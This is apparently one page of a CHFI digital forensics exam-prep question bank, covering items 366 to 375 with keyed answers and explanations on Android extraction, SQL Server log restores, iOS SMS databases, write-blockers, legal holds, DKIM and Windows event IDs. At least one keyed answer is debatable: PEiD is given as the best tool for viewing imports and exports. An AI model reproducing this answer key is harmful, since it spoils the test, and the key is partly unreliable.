Option A is wrong because command and control communication typically involves network indicators such as DNS queries, HTTP/S connections to external IPs, or beaconing patterns, not registry modifications or mutex creation. Option C is wrong because anti-debugging techniques usually involve checking for the presence of a debugger via API calls like IsDebuggerPresent, NtQueryInformationProcess, or timing checks, not creating a mutex or writing to Run keys. Option D is wrong because privilege escalation involves gaining higher-level access rights, often via token manipulation, service exploitation, or UAC bypass; modifying the current user's Run key does not elevate privileges—it only runs code at the existing user's privilege level.

366
MCQmedium

A forensic examiner uses Oxygen Forensic Detective to acquire data from an Android device. The tool reports that it performed a 'full file system' extraction. Which of the following is a prerequisite for this type of extraction?

A.The bootloader must be unlocked
B.The device must be rooted
C.The device must be in recovery mode
D.USB debugging must be enabled
AnswerB

Root access is the decisive prerequisite because Android's kernel sandbox prevents the unprivileged adbd shell user from reading package-private app data, protected system directories, or raw block devices. With root, Oxygen Forensic Detective can execute su or other elevated commands to access /data, application databases, caches, and system partitions, enabling a true file-system extraction. Without root, the tool may still perform a logical extraction of contacts, call logs, and media via public APIs, but the deep application artifacts and deleted-record areas hidden in the file system remain out of reach.

Why this answer

A full file system extraction in Oxygen Forensic Detective requires root access on the Android device because the tool must bypass the Linux kernel's permission model to read protected partitions (e.g., /data, /cache). Without root privileges, the extraction is limited to the logical or file-based scope, as the Android security model restricts user-space processes from accessing raw block devices or system files owned by root.

Exam trap

EC-Council often tests the misconception that USB debugging alone enables full file system extraction, but in reality, USB debugging only provides ADB shell access with limited (shell) user privileges, not the root-level access required for raw partition imaging.

How to eliminate wrong answers

Option A is wrong because an unlocked bootloader is a prerequisite for flashing custom recovery or rooting, but it is not directly required for a full file system extraction; the extraction itself can be performed on a device with a locked bootloader if root access is already obtained. Option C is wrong because recovery mode is used for flashing firmware or performing factory resets, not for forensic extraction; Oxygen Forensic Detective typically requires the device to be booted into Android with USB debugging enabled and root access granted. Option D is wrong because USB debugging is necessary for ADB communication and logical extractions, but it alone does not grant the elevated privileges needed to read the full file system; root access is the critical prerequisite.

367
MCQhard

An organization uses Microsoft SQL Server 2019 with full recovery model. A database administrator accidentally executed a DROP TABLE statement. The transaction log was backed up immediately after the incident. Which forensic technique would allow the analyst to restore the dropped table?

A.Restore the transaction log backup taken after the DROP TABLE and apply it to the database.
B.Use the RESTORE LOG statement with the NO_TRUNCATE option to recover the table.
C.Perform a tail-log backup, then restore the full backup and all subsequent transaction log backups, stopping before the DROP TABLE.
D.Restore the most recent full backup and ignore subsequent transaction log backups.
AnswerC

The correct procedure is to first back up the tail of the transaction log to capture all log records generated since the last backup, including the DROP TABLE transaction. Then restore the most recent full backup in NORECOVERY mode, followed by every subsequent transaction log backup using STOPAT (or STOPBEFOREMARK) set to a time just before the drop. This rolls the database forward to the pre-drop state while preserving all earlier committed changes.

Why this answer

Under the full recovery model, point-in-time recovery is required to undo the DROP TABLE. By performing a tail-log backup (to capture any transactions after the last log backup), then restoring the full backup and all subsequent transaction log backups with STOPAT or STOPBEFOREMARK to the moment just before the DROP TABLE, the analyst can recover the table without losing other transactions. This is the only method that preserves the dropped table's data while maintaining database consistency.

Exam trap

The trap here is that candidates often think a simple transaction log restore (Option A) or a full backup restore (Option D) will suffice, failing to recognize that point-in-time recovery with a tail-log backup and STOPAT is required to skip the destructive DDL statement.

How to eliminate wrong answers

Option A is wrong because restoring only the transaction log backup taken after the DROP TABLE would apply the DROP TABLE operation again, permanently removing the table. Option B is wrong because the NO_TRUNCATE option is used to back up a tail of the log when the database is damaged or offline, not to recover a dropped table; it does not provide point-in-time recovery to skip the DROP. Option D is wrong because restoring only the most recent full backup would lose all changes made after that backup, including the data that existed before the DROP, and would not recover the dropped table.

368
MCQeasy

Which file system journal is commonly used in Linux ext3/ext4 to record metadata changes before they are committed to the main file system?

A.$LogFile
B.Journal (JBD/JBD2)
C.Recycle Bin
D.USN Journal
AnswerB

JBD/JBD2 is the journaling layer embedded in ext3 and ext4, recording metadata transactions in a circular log before committing them to the main file system. This satisfies the stem's requirement for a Linux journal that captures metadata changes pre-commit, enabling fast crash recovery and consistency checks.

Why this answer

The ext3 and ext4 file systems in Linux use the Journal (JBD/JBD2) layer to record metadata changes in a circular log before they are committed to the main file system. This journaling mechanism ensures file system consistency after a crash by allowing replay of committed transactions, with JBD2 specifically supporting ext4's 64-bit features and checksums.

Exam trap

The EC-Council CHFI exam often tests the confusion between Windows-specific artifacts (like $LogFile or USN Journal) and Linux journaling mechanisms, expecting candidates to recognize that ext3/ext4 rely on JBD/JBD2 rather than NTFS structures.

How to eliminate wrong answers

Option A is wrong because $LogFile is the journal file used by NTFS (New Technology File System) in Windows, not by Linux ext3/ext4. Option C is wrong because the Recycle Bin is a Windows feature for temporarily storing deleted files, not a journaling mechanism. Option D is wrong because USN Journal (Update Sequence Number Journal) is an NTFS feature in Windows that tracks changes to files and directories for indexing and backup, not a metadata journal for Linux file systems.

369
MCQmedium

An investigator extracts the SMS.db file from an iOS backup. Which table within this database would contain the actual message content for sent and received messages?

A.message
B.attachment
C.handle
D.chat
AnswerA

The `message` table is the core content store in iOS's `sms.db`; each row represents a single SMS or iMessage and includes the `text` column, which holds the actual message body, along with metadata such as `ROWID`, `guid`, `date`, `is_from_me`, and `handle_id`. An investigator extracting the SMS database from an iOS backup must query this table to recover the textual content of messages. The `text` field can be `NULL` for attachment-only messages, but the conversational text lives here.

Why this answer

The `message` table in iOS's SMS.db database stores the actual text content of each SMS and iMessage in its `text` column. This is the primary table queried to retrieve the body of sent and received messages, as it contains one row per message with fields like `is_from_me`, `date`, and `text`.

Exam trap

EC-Council often tests the distinction between where message content is stored versus where metadata (like attachment info or participant handles) resides, leading candidates to confuse the `chat` or `handle` tables as containing the message body.

How to eliminate wrong answers

Option B is wrong because the `attachment` table stores metadata about file attachments (e.g., file names, MIME types, transfer state), not the message text itself. Option C is wrong because the `handle` table maps phone numbers or email addresses to a unique identifier used for addressing, but does not contain message content. Option D is wrong because the `chat` table defines chat sessions (group chats, participants) and links to messages via the `chat_message_join` table, but does not hold the message body.

370
MCQmedium

An investigator needs to acquire data from a suspect's hard drive without altering any data. Which tool is MOST appropriate to ensure write-blocking at the hardware level?

A.Tableau Forensic Bridge (hardware write-blocker)
B.FTK Imager (software write-blocker)
C.dd command with 'iflag=noatime'
D.EnCase software acquisition module
AnswerA

A Tableau Forensic Bridge is a dedicated hardware write-blocker physically interposed between the forensic workstation and the suspect drive; it intercepts and discards all write commands at the bus level (e.g., SATA, IDE, or USB) using its own firmware and logic, rather than relying on the operating system. This makes it impossible for the OS, forensic software, or malicious code to alter the evidence drive, because write operations are terminated at the hardware interface before reaching the storage medium. Hardware write-blocking is the forensic gold standard and is the most defensible method for maintaining a pristine image.

Why this answer

A hardware write-blocker like the Tableau Forensic Bridge sits between the suspect drive and the forensic workstation at the physical layer, intercepting and blocking any write commands (e.g., ATA WRITE DMA, SCSI WRITE) before they reach the drive. This ensures that no data—including metadata, timestamps, or file system artifacts—is altered during acquisition, which is critical for maintaining evidentiary integrity. Software-based blockers can be bypassed by the OS or a malicious driver, making hardware-level blocking the gold standard in forensic acquisition.

Exam trap

EC-Council often tests the misconception that a software write-blocker (like FTK Imager’s built-in blocker) provides the same level of protection as a hardware write-blocker, when in fact only hardware-level blocking can prevent all write operations—including those from the OS, BIOS, or malicious firmware—from reaching the drive.

How to eliminate wrong answers

Option B (FTK Imager software write-blocker) is wrong because software write-blockers operate at the OS or driver level and can be circumvented by a compromised kernel, a buggy driver, or a direct hardware access command (e.g., via ATA passthrough), so they do not guarantee true hardware-level write protection. Option C (dd command with 'iflag=noatime') is wrong because 'iflag=noatime' only prevents the OS from updating access timestamps on the source file during a dd read, but it does not block write commands at the hardware interface—any write issued by the OS or a misconfigured tool could still reach the drive. Option D (EnCase software acquisition module) is wrong because, while EnCase can use a hardware write-blocker, its software acquisition module alone relies on the OS’s read-only mount or driver-level filtering, which is not a hardware-level write-block and can be overridden by direct disk writes or firmware commands.

371
MCQmedium

An organization receives a legal hold notice regarding pending litigation. The IT department is instructed to preserve all relevant electronically stored information. What is the primary action the IT department should take?

A.Place a hold on relevant data and suspend routine deletion policies
B.Ignore the notice and continue normal operations
C.Create a forensic image of all servers immediately
D.Permanently delete all emails older than 30 days to reduce storage
AnswerA

A legal hold triggers a duty to preserve all potentially relevant data in their native form, so you must place a litigation hold on the specific systems, files, email mailboxes, and backups that could contain responsive information. This includes actively suspending any automated deletion, archival, or retention policies that would destroy or alter that data, ensuring it remains intact and available for later discovery without necessarily needing forensic duplication.

Why this answer

The primary action is to place a legal hold on relevant data and suspend routine deletion policies. This ensures that all potentially relevant electronically stored information (ESI) is preserved in its current state, preventing spoliation and compliance with the legal hold notice. Suspending deletion policies stops automated processes like email purge jobs or document retention schedules from destroying evidence, which is a foundational step in the e-discovery process.

Exam trap

EC-Council often tests the misconception that the immediate response to a legal hold is to create forensic images of all systems, but the correct first step is to suspend deletion policies to prevent data loss before any imaging or collection occurs.

How to eliminate wrong answers

Option B is wrong because ignoring the notice and continuing normal operations would constitute spoliation of evidence, violating the legal hold and potentially leading to severe legal sanctions, including adverse inference instructions or monetary penalties. Option C is wrong because creating a forensic image of all servers immediately is an overreaction and not the first step; imaging is a preservation technique but should be targeted and performed after identifying the scope of relevant data, not indiscriminately across all servers, which is disruptive and unnecessary. Option D is wrong because permanently deleting all emails older than 30 days is the exact opposite of preservation; it would destroy potentially relevant ESI and directly violate the legal hold, risking spoliation charges.

372
MCQeasy

Which email header field is used to verify that an email was sent by the authorized mail server for the domain and has not been tampered with, using cryptographic signatures?

A.X-Mailer
B.Message-ID
C.Received-SPF
D.DKIM-Signature
AnswerD

The DKIM-Signature header contains a cryptographic digital signature (typically RSA or Ed25519) computed over selected headers and the message body using a private key held by the signing domain. The receiving server retrieves the signer's public key via a DNS TXT record and verifies the signature, ensuring that the message was not altered in transit and that it genuinely originates from the claimed domain. This cryptographic binding provides strong integrity and origin authentication, which is exactly what is needed to verify that an email was not tampered with and comes from the stated source.

Why this answer

DKIM (DomainKeys Identified Mail) uses a digital signature to verify the email's origin and integrity.

373
MCQeasy

A forensic analyst is examining a Windows malware sample using static analysis. Which tool is BEST suited for viewing the PE header structure, including sections, imports, and exports?

A.Strings
B.Ghidra
C.IDA Pro
D.PEiD
AnswerD

PEiD (Portable Executable Identifier) is a specialized forensic and reverse-engineering tool that statically parses PE files to identify the compiler, linker, and—most importantly—the packer or protector used. It extracts and displays PE header details such as the entry point, the section table with names and sizes, and optional header fields, then cross-references them against a signature database of known packers (e.g., UPX, ASPack, Themida) using byte patterns and section heuristics. For a malware analyst performing triage, PEiD instantly reveals whether a binary is packed and which tool packed it, making it the correct choice for PE header and packer analysis.

Why this answer

PEiD is specifically designed to analyze PE (Portable Executable) headers, making it ideal for quickly viewing section tables, import/export tables, and detecting packers or compilers. It parses the IMAGE_NT_HEADERS structure directly, providing a concise summary of the PE layout without requiring disassembly or decompilation.

Exam trap

EC-Council often tests the distinction between a specialized PE header analysis tool (PEiD) and general-purpose reverse-engineering tools (Ghidra, IDA Pro), leading candidates to choose a more complex tool when a simpler, purpose-built one is correct.

How to eliminate wrong answers

Option A is wrong because Strings is a command-line tool that extracts readable ASCII/Unicode strings from a binary, not a PE header parser. Option B is wrong because Ghidra is a full reverse-engineering framework focused on disassembly and decompilation, not a lightweight PE header viewer. Option C is wrong because IDA Pro is a disassembler/debugger that can show PE headers but is overkill for this specific task and not the best tool for a quick header inspection.

374
MCQmedium

A forensic analyst examining a Windows machine finds a suspicious service named 'SrvMon' installed. The System event log shows Event ID 7045 at the time of compromise. What does this event indicate?

A.A logon attempt failed
B.A user account was created
C.A service was installed
D.A scheduled task was created
AnswerC

Event ID 7045 is generated by the Service Control Manager (SCM) in the System log whenever a service is newly installed on a Windows machine, making it a reliable indicator of service installation. The event displays the service name, image path, service type, start type, and service account — details that help an analyst identify persistence mechanisms or malicious services. For example, a service pointing to a DLL in a user-writable Temp folder would be highly suspicious.

Why this answer

Event ID 7045 in the Windows System event log is specifically generated when a new service is installed on the system. The forensic analyst found a suspicious service named 'SrvMon', and the presence of this event at the time of compromise directly indicates that the service was installed, making option C correct.

Exam trap

The trap here is that candidates confuse Event ID 7045 with security-related events (like logon or account creation) because they occur in the same timeframe, but 7045 is strictly a System log event for service installation, not a Security log event.

How to eliminate wrong answers

Option A is wrong because failed logon attempts generate Event ID 4625 (Security log), not Event ID 7045. Option B is wrong because user account creation generates Event ID 4720 (Security log), not Event ID 7045. Option D is wrong because scheduled task creation generates Event ID 4698 (Security log) or Task Scheduler operational log events, not Event ID 7045.

375
Multi-Selectmedium

Which TWO tools are specifically designed for file carving (recovering files based on signatures) and are commonly used in digital forensics?

Select 2 answers
A.Volatility
B.Scalpel
C.Foremost
D.EnCase
E.Autopsy
AnswersB, C

Scalpel is a dedicated file carving tool written in C, originally derived from Foremost but completely rewritten for speed and efficiency. It uses a configuration file (carve.conf) to define binary header and footer signatures, then scans raw byte streams to extract files without needing filesystem metadata. Its entire purpose is file carving, making it a correct answer.

Why this answer

Scalpel (B) is correct because it is a signature-based file carving tool derived from Foremost that reads a configurable header/footer database to extract files from raw disk images or unallocated space without relying on filesystem metadata. Foremost (C) is correct because it was originally developed for the U.S. Air Force OSI and carves files by matching file headers and footers (e.g., JPEG, PDF, ZIP) in disk images, making it a canonical carving utility in digital forensics.

Volatility (A) is a memory forensics framework for analyzing RAM dumps, not a file carver. EnCase (D) is a full commercial forensic suite that can recover files via filesystem parsing and some carving, but it is not specifically designed as a signature-based carving tool. Autopsy (E) is a graphical forensic platform that integrates carving modules (often via Scalpel or its own ingest modules) but is not itself a dedicated carving tool.

Exam trap

EC-Council often tests the distinction between dedicated file carving tools (Scalpel, Foremost) and broader forensic suites (EnCase, Autopsy) that include carving as a secondary feature, leading candidates to incorrectly select the more well-known commercial tools.

Page 4

Page 5 of 10

Page 6

All pages